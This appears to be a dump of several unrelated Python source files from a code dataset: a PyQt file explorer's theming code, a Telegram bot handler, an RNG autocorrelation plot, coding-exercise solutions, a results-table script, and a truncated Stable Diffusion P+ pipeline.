self.set_acrylic(True, 'set_on_left')\r\n elif read == 'default':\r\n self.set_acrylic(True, 'default')\r\n\r\n def theme_manager(self):\r\n\r\n if self.theme_box.currentText() == 'Dark':\r\n self.set_acrylic(False, 'dark')\r\n self.themeRegistry('dark')\r\n\r\n elif self.theme_box.currentText() == 'Blur':\r\n with open('effectSupport.dll', 'w') as writer:\r\n writer.write('ten')\r\n self.themeRegistry('blur')\r\n\r\n with open(\"assets/resources/holder.tru\", 'r') as val:\r\n r = val.read()\r\n # Frame One UI\r\n frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=10))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg\")\r\n\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(False, 'transparent')\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n elif self.theme_box.currentText() == 'Default':\r\n self.set_acrylic(True, 'set_on_left')\r\n self.themeRegistry('default')\r\n\r\n elif self.theme_box.currentText() == 'Amoled':\r\n self.set_acrylic(False, 'amoled')\r\n self.themeRegistry('amoled')\r\n\r\n elif self.theme_box.currentText() == 'Acrylic':\r\n with open('effectSupport.dll', 'w') as writer:\r\n writer.write('acrylic')\r\n with open(\"assets/resources/holder.tru\", 'r') as val:\r\n r = val.read()\r\n # Frame One UI\r\n frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=35))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg\")\r\n\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(False, 'transparent')\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n else:\r\n self.set_acrylic(False, 'amoled')\r\n self.graphics.setStyleSheet(f\"\"\"\r\n \r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n self.themeRegistry('acrylic')\r\n elif self.theme_box.currentText() == 'Transparent':\r\n self.set_acrylic(False, 'semi-transparent')\r\n\r\ndef switch_check():\r\n writer = open(\"config.dll\", \"w\")\r\n if keyboard.is_pressed(\"alt\"):\r\n writer.write(\"False\")\r\n elif keyboard.read_key() == 'left windows':\r\n writer.write('False')\r\n print('window set up')\r\n else:\r\n writer.write(\"True\")\r\n\r\n print('Checking switch..')\r\n writer.close()\r\n\r\n# @ staticmethod\r\ndef check_window():\r\n try:\r\n # get the current active window\r\n a = pygetwindow.getActiveWindowTitle()\r\n\r\n if str(a) != \"Fluent Explorer.exe\":\r\n try:\r\n\r\n # minimize\r\n MainWindow.showMinimized()\r\n\r\n with open(\"config.dll\", \"r\") as reader:\r\n read_config = reader.read()\r\n\r\n # grab screen\r\n if read_config == \"True\" or read_config == '':\r\n get_image = screenshot()\r\n print('Using Brush..')\r\n\r\n # random value grabber\r\n r = str(randint(10, 100000))\r\n\r\n # save value into a file for furure use this is the fool\r\n with open(\"assets/resources/holder.tru\", 'w') as hold:\r\n hold.write(r)\r\n\r\n # save at this location thi\r\n get_image.save(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n\r\n with open(\"assets/resources/holder.tru\", 'r') as val:\r\n r = val.read()\r\n # Frame One UI\r\n frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n # blur the image\r\n with open('effectSupport.dll', 'r') as reader:\r\n read = reader.read()\r\n\r\n if read == 'ten':\r\n radii = 10\r\n else:\r\n radii = 35\r\n\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=radii))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg\")\r\n\r\n # will raise OS error if imaghow to add padding in pushbutton icon in pyqte is subjected to modifications\r\n except OSError:\r\n pass\r\n\r\n elif MainWindow.isMaximized():\r\n MainWindow.setWindowOpacity(1.0)\r\n\r\n # FRAMES UI\r\n\r\n # FRAME 1\r\n with open(\"assets/resources/qr.tru\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n with open(\"lib.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n # MainWindow.set_acrylic(True, \"set_all\")\r\n MainWindow.setTheme()\r\n else:\r\n # MainWindow.set_acrylic(True, \"set_on_left\")\r\n MainWindow.setTheme()\r\n with open(\"assets/resources/qr.tru\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n\r\n else:\r\n MainWindow.set_acrylic(False, \"dark\")\r\n\r\n except NameError:\r\n pass\r\n\r\n\r\ndef no_screen():\r\n current = pygetwindow.getActiveWindowTitle()\r\n if MainWindow.isMinimized() or current != \"Fluent Explorer.exe\" or not MainWindow.isMaximized():\r\n with open(\"assets/resources/block.tru\", \"w\") as writer:\r\n writer.write(\"True\")\r\n with open(\"assets/resources/qr.tru\", \"w\") as writer:\r\n writer.write(\"True\")\r\n if MainWindow.isMaximized():\r\n MainWindow.setWindowOpacity(1.0)\r\n with open(\"assets/resources/block.tru\", 'r') as reader:\r\n read = str(reader.read())\r\n if read == \"True\":\r\n MainWindow.fluentHandler()\r\n with open(\"assets/resources/block.tru\", \"w\") as writer:\r\n writer.write(\"False\")\r\n if MainWindow.isMinimized() or current != \"Fluent Explorer.exe\":\r\n with open(\"assets/resources/QtS.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n\r\n if not MainWindow.isMaximized():\r\n\r\n with open(\"assets/resources/QtS.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n MainWindow.setStyleSheet(\"\"\"background-color: black;\"\"\")\r\n MainWindow.graphics.setStyleSheet(\"\"\"background-color: black;\"\"\")\r\n\r\n\r\ndef cleaner():\r\n walker = os.walk(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache')\r\n\r\n for i in walker:\r\n r = i[2]\r\n for g in r:\r\n if g.endswith('.jpeg'):\r\n with open(f'assets/resources/holder.tru', \"r\") as t:\r\n ri = str(t.read())\r\n if ri in str(g):\r\n pass\r\n else:\r\n z = g\r\n try:\r\n os.remove(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/{z}\")\r\n except (PermissionError, FileNotFoundError):\r\n pass\r\n\r\n\r\ndef clock(func, sec):\r\n def wrapper():\r\n clock(func, sec)\r\n func()\r\n\r\n t = Timer(sec, wrapper)\r\n try:\r\n t.start()\r\n except RuntimeError:\r\n pass\r\n\r\n\r\nclock(cleaner, 1.0)\r\nclock(switch_check, 0.2)\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n MainWindow = Main()\r\n windowTimer = QTimer()\r\n windowTimer.timeout.connect(no_screen)\r\n windowTimer.timeout.connect(check_window)\r\n windowTimer.setInterval(1)\r\n windowTimer.start()\r\n MainWindow.show()\r\n app.exec()\r\n\r\n\r\n","repo_name":"LegendAwaken/iSurf-File-Explorer","sub_path":"iSurf.py","file_name":"iSurf.py","file_ext":"py","file_size_in_byte":31858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38069266279","text":"# Файл хендлера \"client\"\n#\nfrom bot_init import bot\nfrom aiogram import types, Dispatcher\nfrom aiogram.types import ReplyKeyboardRemove\n# импортируем нашу клавиатуру для клиента\nfrom keyboards.keyboards_client import kb_client\n\n# @dp.message_handler(commands=['start', 'help'])\nasync def commands_start(message : types.Message):\n try:\n # добавим нашу клавиатуру добавив аргумент reply_markup=kb_client\n await bot.send_message(message.from_user.id, \"Ты ввел /start или /help\", reply_markup=kb_client)\n await bot.send_message(message.from_user.id, \"Сработала функция commands_start..\")\n except:\n await message.reply(\"Общение с ботом только через ЛС, напишите ему.\")\n\n\nasync def menu(message : types.Message):\n await bot.send_message(message.from_user.id, \"Меню пока не готово\")\n\nasync def info(message : types.Message):\n await bot.send_message(message.from_user.id, \"Инфо о нас пока нет\")\n\n# reply_markup=ReplyKeyboardRemove() удаляет клавиатуру\nasync def del_keyboard(message : types.Message):\n await bot.send_message(message.from_user.id, \"Удаление клавиатуры\", reply_markup=ReplyKeyboardRemove())\n\ndef register_handlers_client(dp : Dispatcher):\n dp.register_message_handler(commands_start, commands=['start', 'help'])\n dp.register_message_handler(menu, commands=['menu'])\n dp.register_message_handler(info, commands=['info'])\n dp.register_message_handler(del_keyboard, commands=['del_keyboard'])","repo_name":"Azhdar1990/Parsers","sub_path":"telegram_aiogram/5_keyboard_buttons/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34855410439","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\ndef auto_correlate(x):\n cor = np.correlate(x,x,mode=\"full\")\n return cor[N-1:]\ndef rng(seed, a, b, M, ntotal):\n data = np.zeros(ntotal)\n data[0] = seed\n for i in range(1,ntotal):\n data[i] = np.mod((a*data[i-1]+b), M)\n return data/np.float(M)\nseed,a,b,m,N = 123456, 8121, 28411, 134456, 100000\nX = rng(seed, a, b, m, N)\nc = auto_correlate(X-np.average(X))/N\nplt.plot(c/c[0],'r',lw=2)\nplt.xlabel(r'$i$')\nplt.ylabel(r'$\\varphi(i)$')\nplt.xlim(-500,8000)\nplt.show()\n","repo_name":"p768lwy3/MOOC_edX","sub_path":"KyotoUx009x - Stochastic Processes - Data Analysis and Computer Simulation/Week 2/hw2-4.py","file_name":"hw2-4.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13952969815","text":"#!/usr/bin/env python2.7\nfrom typing import List\n\ndef solution(l, t): # type: (List[int], int) -> List[int]\n left = 0\n right = 0\n total = 0\n\n while (left <= len(l)):\n # If the right pointer goes through the entire array,\n # this means the sum of numbers in range [left, right] are less than t.\n # Break out of loop in this case.\n if right >= len(l):\n break\n\n total += l[right]\n\n if total == t:\n return [left, right]\n\n right += 1\n\n if total > t:\n left += 1\n right = left\n total = 0\n\n return [-1, -1]\n\n\n# ============================ Official test-cases ============================\nassert solution([1, 2, 3, 4], 15) == [-1, -1], 'solution([1, 2, 3, 4], 15) failed!'\nassert solution([4, 3, 10, 2, 8], 12) == [2, 3], 'solution([4, 3, 10, 2, 8], 12) failed!'\n\n# =========== My own, unofficial test cases to help debug behaviour ===========\nassert solution([4, 3, 5, 7, 8], 12) == [0, 2], 'solution([4, 3, 5, 7, 8], 12) failed!'\nassert solution([1, 2, 4, 3, 5, 7, 8], 12) == [2, 4], 'solution([1, 2, 4, 3, 5, 7, 8], 12) failed!'\nassert solution([1, 12, 4], 12) == [1, 1], 'solution([1, 12, 4], 12) failed!'\n","repo_name":"Jamie-Rodriguez/google-foobar","sub_path":"numbers-station-coded-messages/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31833897533","text":"import os\nimport pickle\nimport itertools\nfrom tqdm import tqdm\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom evaluation.constants import DATASET_NAMES, INTERACTION_CATEGORIES, METRICS, METHOD_NAMES\nfrom evaluation.utils import mkdir_if_missing\n\n\ndef load_pickle_files(args):\n results_dict = {}\n for metric, ec, dset, method in tqdm(list(\n itertools.product(args.metrics, args.evaluate_category, DATASET_NAMES, args.methods))):\n agg = metric.split('_')[0]\n metric = \"_\".join(metric.split('_')[1:])\n if ec:\n metric += \"_cat\"\n pickle_dir = os.path.join(args.eval_results_path, method, dset)\n try:\n pickle_file = os.path.join(pickle_dir, f'stats_{metric}_{agg}.pkl')\n with open(pickle_file, 'rb') as f:\n stats = pickle.load(f)\n avg = stats.avg\n if ec:\n for cat_i, cat in enumerate(INTERACTION_CATEGORIES.values()):\n key_tup = cat, method, dset, metric\n if avg is None:\n results_dict[key_tup] = np.nan\n else:\n results_dict[key_tup] = avg[cat_i]\n else:\n key_tup = 'agg', method, dset, metric\n if avg is None:\n results_dict[key_tup] = np.nan\n else:\n results_dict[key_tup] =avg\n except FileNotFoundError:\n print(f\"No file found for {dset} {method} {metric}-{agg} {'ec' if ec else ''} @ {pickle_file}\")\n continue\n\n return results_dict\n\n\ndef main(args):\n # generate results tables\n results_dict = load_pickle_files(args)\n df = pd.DataFrame(list(results_dict.values()), index=pd.MultiIndex.from_tuples(list(results_dict.keys())))\n df = df.reset_index()\n df.columns = ['Category', 'Method', 'Dataset', 'Metric', 'Value']\n # get datasets as the columns, and add the ETC_UCY Avg. as a column\n df = df.pivot_table(index=['Category', 'Method', 'Metric'], columns='Dataset', values='Value')\n if len(df.index.get_level_values('Category').unique()) == 1:\n df.reset_index(level='Category', drop=True, inplace=True)\n mkdir_if_missing(args.save_results_path)\n for metric in df.index.get_level_values('Metric').unique():\n df.xs(metric, level='Metric').to_csv(os.path.join(args.save_results_path, f'{metric}.tsv'), sep='\\t')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--methods', '-m', nargs='+', type=str, default=METHOD_NAMES)\n parser.add_argument('--datasets', '-d', nargs='+', type=str, default=DATASET_NAMES)\n parser.add_argument('--aggregations', '-a', nargs='+', type=str, default=['min', 'mean'])\n parser.add_argument('--evaluate_category', '-ec', nargs='+',\n type=lambda x: True if x.lower()==\"true\" else False, default=[False])\n parser.add_argument('--metrics', '-mr', nargs='+', type=str, default=METRICS)\n parser.add_argument('--num_samples', '-ns', nargs='+', type=int, default=[20])\n parser.add_argument('--eval_results_path', default='results/evaluations')\n parser.add_argument('--save_results_path', default='results/results_tables')\n\n args = parser.parse_args()\n main(args)","repo_name":"ericaweng/joint-metrics-matter","sub_path":"get_results_tables.py","file_name":"get_results_tables.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"73261925650","text":"def search(mat, n, x):\n if n == 0:\n return -1\n\n # Traverse through the matrix\n for i in range(n):\n for j in range(n):\n\n # If the element is found\n if mat[i][j] == x:\n print(\"Element found at (\", i, \",\", j, \")\")\n return 1\n\n print(\" Element not found\")\n return 0\n\n\ndef search_v1(mat, n, x):\n i = 0\n\n # set indexes for top right element\n j = n - 1\n while i < n and j >= 0:\n\n if mat[i][j] == x:\n print(\"n Found at \", i, \", \", j)\n return 1\n\n if mat[i][j] > x:\n j -= 1\n\n # if mat[i][j] < x\n else:\n i += 1\n\n print(\"Element not found\")\n return 0 # if (i == n || j == -1 )\n\n\ndef search_v2(mat, x, i, j):\n if mat[i][j] == x:\n return (i, j)\n\n if x > mat[i][j]:\n i = i + 1\n elif x < mat[i][j]:\n i = i - 1\n return search_v2(mat, x, i, j)\n\n\nif __name__ == \"__main__\":\n mat = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 50],\n ]\n search(mat, 4, 29)\n\n print(\"-----------\")\n mat = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 50],\n ]\n search_v1(mat, 4, 29)\n\n print(\"-----------\")\n mat = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 50],\n ]\n mid = (len(mat) // 2) - 1\n print(search_v2(mat, 29, mid, mid))\n","repo_name":"Chitrank-Dixit/coding-questions","sub_path":"dcp/arrays/search_in_matrix.py","file_name":"search_in_matrix.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5607180183","text":"import os\nimport json\nfrom typing import Optional, List, Union, Callable, Dict, Any, Tuple\nimport torch\nfrom transformers import CLIPTextModel, CLIPTokenizer\nfrom diffusers import StableDiffusionPipeline\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import StableDiffusionPipelineOutput\nfrom diffusers.utils import logging\nfrom huggingface_hub import hf_hub_download\nfrom prompt_plus.prompt_plus_unet_2d_condition import PPlusUNet2DConditionModel\n\n\nlogger = logging.get_logger(__name__)\n\n\nclass TextualInversionStableDiffusionPipeline(StableDiffusionPipeline):\n @classmethod\n def from_learned_embed(\n cls,\n pretrained_model_name_or_path: Union[str, os.PathLike],\n learned_embed_name_or_path: Union[str, os.PathLike],\n **kwargs\n ):\n if os.path.exists(learned_embed_name_or_path):\n embeds_path = os.path.join(learned_embed_name_or_path, \"learned_embeds.bin\") if os.path.isdir(learned_embed_name_or_path) else learned_embed_name_or_path\n # token_path = os.path.join(model_dir, \"token_identifier.txt\")\n else:\n # download\n embeds_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"learned_embeds.bin\")\n # token_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"token_identifier.txt\")\n\n text_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\", **kwargs\n )\n tokenizer = CLIPTokenizer.from_pretrained(pretrained_model_name_or_path, subfolder=\"tokenizer\", **kwargs)\n loaded_learned_embeds = torch.load(embeds_path, map_location=\"cpu\")\n # separate token and the embeds\n trained_token = list(loaded_learned_embeds.keys())[0]\n embeds = loaded_learned_embeds[trained_token]\n\n # cast to dtype of text_encoder\n dtype = text_encoder.get_input_embeddings().weight.dtype\n embeds.to(dtype)\n\n # add the token in tokenizer\n # token = token if token is not None else trained_token\n num_added_tokens = tokenizer.add_tokens(trained_token)\n if num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {trained_token}. Please pass a different `token` that is not already in the tokenizer.\")\n\n # resize the token embeddings\n text_encoder.resize_token_embeddings(len(tokenizer))\n\n # get the id for the token and assign the embeds\n token_id = tokenizer.convert_tokens_to_ids(trained_token)\n text_encoder.get_input_embeddings().weight.data[token_id] = embeds\n print(f\"placeholder_token: {trained_token}\")\n return super().from_pretrained(\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n **kwargs\n )\n\n\ndef _load_embed_from_name_or_path(learned_embed_name_or_path):\n if os.path.exists(learned_embed_name_or_path):\n embeds_path = os.path.join(learned_embed_name_or_path, \"learned_embeds.bin\") if os.path.isdir(\n learned_embed_name_or_path) else learned_embed_name_or_path\n # config_path = os.path.join(model_dir, \"config.json\")\n else:\n # download\n embeds_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"learned_embeds.bin\")\n # config_path = hf_hub_download(repo_id=pretrained_model_name_or_path, filename=\"config.json\")\n # with open(config_path, \"r\", encoding=\"utf-8\") as f:\n # config = json.load(f)\n # load\n loaded_learned_embeds = torch.load(embeds_path, map_location=\"cpu\")\n return loaded_learned_embeds\n\n\ndef load_embed_from_name_or_path(learned_embed_name_or_path, style_mixing_k_K=None):\n if isinstance(learned_embed_name_or_path, str):\n assert style_mixing_k_K is None, \"You inputted only one learned embed but `style_mixing_k_K` was specified!\"\n return _load_embed_from_name_or_path(learned_embed_name_or_path)\n else:\n assert len(learned_embed_name_or_path) == 2, \"Only 2 embeds are supported for now but it's especially possible.\"\n k, K = style_mixing_k_K\n embeds = []\n for p in learned_embed_name_or_path:\n embeds.append(_load_embed_from_name_or_path(p))\n # use first embeds tokens to align\n tokens = list(embeds[0].keys())\n n = len(tokens)\n assert k < n, f\"k must be lower than n={n}\"\n assert K < n, f\"K must be lower than n={n}\"\n loaded_learned_embeds = dict()\n for i in range(n):\n if i <= k or K > i:\n embed_idx = 0\n else:\n embed_idx = 1\n embed = list(embeds[embed_idx].values())[i]\n loaded_learned_embeds[tokens[i]] = embed\n return loaded_learned_embeds\n\n\nclass PPlusStableDiffusionPipeline(StableDiffusionPipeline):\n @classmethod\n def from_learned_embed(\n cls,\n pretrained_model_name_or_path: Union[str, os.PathLike],\n learned_embed_name_or_path: Optional[Union[str, os.PathLike, List[str]]] = None,\n style_mixing_k_K: Optional[Tuple[int]] = None,\n loaded_learned_embeds: Optional[Dict[str, torch.Tensor]] = None,\n **kwargs,\n ):\n text_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\", **kwargs\n )\n tokenizer = CLIPTokenizer.from_pretrained(pretrained_model_name_or_path, subfolder=\"tokenizer\", **kwargs)\n if loaded_learned_embeds is None:\n loaded_learned_embeds = load_embed_from_name_or_path(learned_embed_name_or_path, style_mixing_k_K)\n new_tokens = list(loaded_learned_embeds.keys())\n # easy validation for textual inversion\n assert len(new_tokens) > 1, \"You might want to load textual inversion pipeline!\"\n # cast to dtype of text_encoder\n dtype = text_encoder.get_input_embeddings().weight.dtype\n # resize the token embeddings\n text_encoder.resize_token_embeddings(len(tokenizer)+len(new_tokens))\n\n for token in new_tokens:\n embeds = loaded_learned_embeds[token]\n embeds.to(dtype)\n # add the token in tokenizer\n # token = token if token is not None else trained_token\n num_added_tokens = tokenizer.add_tokens(token)\n if num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {token}. Please pass a different `token` that is not already in the tokenizer.\")\n # get the id for the token and assign the embeds\n token_id = tokenizer.convert_tokens_to_ids(token)\n text_encoder.get_input_embeddings().weight.data[token_id] = loaded_learned_embeds[token]\n # store placeholder_token to text_encoder config\n text_encoder.config.placeholder_token = \"-\".join(new_tokens[0].split(\"-\")[:-1])\n text_encoder.config.placeholder_tokens = new_tokens\n print(f\"placeholder_token: {text_encoder.config.placeholder_token}\")\n unet = PPlusUNet2DConditionModel.from_pretrained(pretrained_model_name_or_path, subfolder=\"unet\", **kwargs)\n return super().from_pretrained(\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n unet=unet,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n **kwargs\n )\n\n def _encode_prompt(\n self,\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt=None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n ):\n assert isinstance(prompt, str), \"Currently, only string `prompt` is supported!\"\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n\n if prompt_embeds is None:\n encoder_hidden_states_list = []\n for token in self.text_encoder.config.placeholder_tokens:\n one_prompt = prompt.replace(self.text_encoder.config.placeholder_token, token)\n text_inputs = self.tokenizer(\n one_prompt,\n padding=\"max_length\",\n max_length=self.tokenizer.model_max_length,\n truncation=True,\n return_tensors=\"pt\",\n )\n text_input_ids = text_inputs.input_ids\n untruncated_ids = self.tokenizer(one_prompt, padding=\"longest\", return_tensors=\"pt\").input_ids\n\n if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal(\n text_input_ids, untruncated_ids\n ):\n removed_text = self.tokenizer.batch_decode(\n untruncated_ids[:, self.tokenizer.model_max_length - 1: -1]\n )\n logger.warning(\n \"The following part of your input was truncated because CLIP can only handle sequences up to\"\n f\" {self.tokenizer.model_max_length} tokens: {removed_text}\"\n )\n\n if hasattr(self.text_encoder.config,\n \"use_attention_mask\") and self.text_encoder.config.use_attention_mask:\n attention_mask = text_inputs.attention_mask.to(device)\n else:\n attention_mask = None\n\n prompt_embeds = self.text_encoder(\n text_input_ids.to(device),\n attention_mask=attention_mask,\n )\n prompt_embeds = prompt_embeds[0]\n prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)\n\n bs_embed, seq_len, _ = prompt_embeds.shape\n # duplicate text embeddings for each generation per prompt, using mps friendly method\n prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1)\n prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1)\n\n # get unconditional embeddings for classifier free guidance\n if do_classifier_free_guidance:\n uncond_tokens: List[str]\n if negative_prompt is None:\n uncond_tokens = [\"\"] * batch_size\n elif type(prompt) is not type(negative_prompt):\n raise TypeError(\n f\"`negative_prompt` should be the same type to `prompt`, but got {type(negative_prompt)} !=\"\n f\" {type(prompt)}.\"\n )\n elif isinstance(negative_prompt, str):\n uncond_tokens = [negative_prompt]\n elif batch_size != len(negative_prompt):\n raise ValueError(\n f\"`negative_prompt`: {negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:\"\n f\" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches\"\n \" the batch size of `prompt`.\"\n )\n else:\n uncond_tokens = negative_prompt\n\n max_length = prompt_embeds.shape[1]\n uncond_input = self.tokenizer(\n uncond_tokens,\n padding=\"max_length\",\n max_length=max_length,\n truncation=True,\n return_tensors=\"pt\",\n )\n\n if hasattr(self.text_encoder.config,\n \"use_attention_mask\") and self.text_encoder.config.use_attention_mask:\n attention_mask = uncond_input.attention_mask.to(device)\n else:\n attention_mask = None\n\n negative_prompt_embeds = self.text_encoder(\n uncond_input.input_ids.to(device),\n attention_mask=attention_mask,\n )\n negative_prompt_embeds = negative_prompt_embeds[0]\n\n # duplicate unconditional embeddings for each generation per prompt, using mps friendly method\n seq_len = negative_prompt_embeds.shape[1]\n\n negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)\n\n negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1)\n negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len,\n -1)\n\n # For classifier free guidance, we need to do two forward passes.\n # Here we concatenate the unconditional and text embeddings into a single batch\n # to avoid doing two forward passes\n prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds])\n\n encoder_hidden_states_list.append(prompt_embeds)\n else:\n # trust you!\n encoder_hidden_states_list = prompt_embeds\n return encoder_hidden_states_list\n\n @torch.no_grad()\n def __call__(\n self,\n prompt: Union[str, List[str]] = None,\n height: Optional[int] = None,\n width: Optional[int] = None,\n num_inference_steps: int = 50,\n guidance_scale: float = 7.5,\n negative_prompt: Optional[Union[str, List[str]]] = None,\n num_images_per_prompt: Optional[int] = 1,\n eta: float = 0.0,\n generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n latents: Optional[torch.FloatTensor] = None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n output_type: Optional[str] = \"pil\",\n return_dict: bool = True,\n callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n callback_steps: int = 1,\n cross_attention_kwargs: Optional[Dict[str, Any]] = None,\n ):\n # 0. Default height and width to unet\n height = height or self.unet.config.sample_size * self.vae_scale_factor\n width = width or self.unet.config.sample_size * self.vae_scale_factor\n\n # 1. Check inputs. Raise error if not correct\n self.check_inputs(\n prompt, height, width, callback_steps, negative_prompt, prompt_embeds, negative_prompt_embeds\n )\n\n # 2. Define call parameters\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n\n device = self._execution_device\n # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)\n # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`\n # corresponds to doing no classifier free guidance.\n do_classifier_free_guidance = guidance_scale > 1.0\n\n # 3. Encode input prompt\n encoder_hidden_states_list = self._encode_prompt(\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt,\n prompt_embeds=prompt_embeds,\n negative_prompt_embeds=negative_prompt_embeds,\n )\n\n # 4. Prepare timesteps\n self.scheduler.set_timesteps(num_inference_steps, device=device)\n timesteps = self.scheduler.timesteps\n\n # 5. Prepare latent variables\n num_channels_latents = self.unet.in_channels\n latents = self.prepare_latents(\n batch_size * num_images_per_prompt,\n num_channels_latents,\n height,\n width,\n encoder_hidden_states_list[0].dtype,\n device,\n generator,\n latents,\n )\n\n # 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline\n extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)\n\n # 7. Denoising loop\n num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order\n with self.progress_bar(total=num_inference_steps) as progress_bar:\n for i, t in enumerate(timesteps):\n # expand the latents if we are doing classifier free guidance\n latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents\n latent_model_input = self.scheduler.scale_model_input(latent_model_input, t)\n\n # predict the noise residual\n noise_pred = self.unet(\n latent_model_input,\n t,\n encoder_hidden_states_list=encoder_hidden_states_list,\n cross_attention_kwargs=cross_attention_kwargs,\n ).sample\n\n # perform guidance\n if do_classifier_free_guidance:\n noise_pred_uncond, noise_pred_text = 